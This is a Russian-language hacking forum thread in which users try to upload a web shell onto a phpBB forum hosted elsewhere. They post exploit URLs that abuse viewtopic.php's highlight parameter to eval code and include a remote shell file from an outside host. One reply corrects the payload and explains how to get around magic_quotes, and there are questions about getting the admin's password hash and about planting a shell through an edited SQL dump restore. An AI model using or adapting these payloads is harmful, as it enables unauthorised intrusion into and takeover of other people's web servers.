Приет. У меня проблемы с заливкой шеллла на форум phpbb Хотинг находится на hut.ru. Там вроде как помню запрещено ссылатся на удаленные файлы. пишу в строку такой код "http://www.ля-ля-ля.ru/viewtopic.php?xxx=wget%20http://ля-ля-ля.narod.ru/remview.php &p=12&highlight=%2527.system($_GET[xxx]).include%2527" Вылазеет ошибки как и надо: Code: Warning: Unknown()\b#i): failed to open stream: No such file or directory in /home/Z/ewfefe.ru/WWW/viewtopic.php(1104) : regexp code on line 1 Warning: (null)(): Failed opening ')\b#i' for inclusion (include_path='.:') in /home/z/ewfewfe.ru/WWW/viewtopic.php(1104) : regexp code on line 1 Warning: No ending delimiter '#' found in /home/z/ewfewfew.ru/WWW/viewtopic.php(1104) : regexp code on line 2 Но файл не заливается на сервак. Что делать? можно ли через viewtopic получить хотябы хеш админа? Заранее ОЧЕНЬ! благодарен.
Да, не поддерживает, само собой, кроме того увидел странную конструкцию - highlight=%2527.system($_GET[xxx]).include%2527" viewtopic.php?t=2206&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://your.site.com/shell.php Вот это верный вариант, на будущее, переменные с1 и с2 лучше кавычками не обрамлять, ибо на серевер может стоять опция magic_quotes=on, которая будет добавлять к каждой твоей кавчыка слеш, что портит код и препятствует его исполнению. И как указано выше, пробуй, конечно, расширение шелла менять на txt - предварительно создав файл shell.txt
Непомогло Ни переименование файла, ни изменение кода Code: Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1 Ссылки все правильные
Люди помогите а? Вот мой шелл: http://scriptmyphp.narod.ru/remview.php и он же http://scriptmyphp.narod.ru/remview.txt Запрос такой: Code: http://Name.ru/viewtopic.php?t=12&highlight=%2527.eval($_GET[c1]).%2527&c1=include($_GET[c2])&c2=http://scriptmyphp.narod.ru/remview.txt Запрос правильный? Выводится Code: Parse error: parse error, unexpected $ in /home/z/ыshthj.ru/WWW/viewtopic.php(1104) : regexp code(1) : eval()'d code on line 1
Не стал создавать новую тему. Вопрос все тот же - заливка шела через админ панель phpBB. На форуме предлагается заливать посредством SQL =====> Дам базы формума - Внесение в дамп код шела - Рестор подправленной базы. Послкольку сам я никогда с этим дела не имел, вопрос в следующем: Необходимо ресторить дамп базы всего форума или же будет достаточно дапма содержащего толко sql запрос на запись шела? Вопрос назрел потому, что дамп весит больше 100Мг в неупакованном виде (gzip запрещен). Не понятно каким образом происходит рестор - это полное стирание существующего с последующей добавлением, или же - добавление и перезапись уже существующего. Если первое, то после ресторе дампа содержащего лишь код шела будет пустой форум, что не хотелось бы. Вопрос скорее касается не phpBB, а SQL в целом.